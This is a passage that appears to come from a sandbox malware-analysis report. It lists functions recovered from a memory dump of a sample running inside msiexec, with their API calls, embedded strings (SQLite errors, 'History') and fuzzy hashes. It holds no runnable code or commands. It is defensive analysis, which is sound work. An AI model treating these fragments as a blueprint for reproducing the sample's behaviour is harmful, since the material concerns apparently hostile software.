                                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                            • Opcode Fuzzy Hash: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                            APIs
                                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                            • free.MSVCRT ref: 00417544
                                                                                                            • free.MSVCRT ref: 00417562
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4131324427-0
                                                                                                            • Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                            • Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                            • free.MSVCRT ref: 0041822B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PathTemp$free
                                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                                            • API String ID: 924794160-1420421710
                                                                                                            • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                            • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                            • API String ID: 1775345501-2769808009
                                                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                                            • String ID: Error$Error %d: %s
                                                                                                            • API String ID: 313946961-1552265934
                                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                                            • API String ID: 0-1953309616
                                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                            • API String ID: 3510742995-272990098
                                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1265369119-0
                                                                                                            • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                            • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: gj
                                                                                                            • API String ID: 1297977491-4203073231
                                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                            • free.MSVCRT ref: 0040E9D3
                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@$free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2241099983-0
                                                                                                            • Opcode ID: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                            • Opcode Fuzzy Hash: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                            APIs
                                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                            • free.MSVCRT ref: 004174E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4053608372-0
                                                                                                            • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                            • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                                            • String ID:
                                                                                                            • API String ID: 4247780290-0
                                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1471605966-0
                                                                                                            • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                            • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                            APIs
                                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                            • String ID: \StringFileInfo\
                                                                                                            • API String ID: 102104167-2245444037
                                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memicmpwcslen
                                                                                                            • String ID: @@@@$History
                                                                                                            • API String ID: 1872909662-685208920
                                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                                            • memset.MSVCRT ref: 00410112
                                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                            • String ID: </%s>
                                                                                                            • API String ID: 3400436232-259020660
                                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                            • String ID: caption
                                                                                                            • API String ID: 1523050162-4135340389
                                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                            • String ID: MS Sans Serif
                                                                                                            • API String ID: 210187428-168460110
                                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName_wcsicmpmemset
                                                                                                            • String ID: edit
                                                                                                            • API String ID: 2747424523-2167791130
                                                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                                            • API String ID: 3150196962-1506664499
                                                                                                            • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                            • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
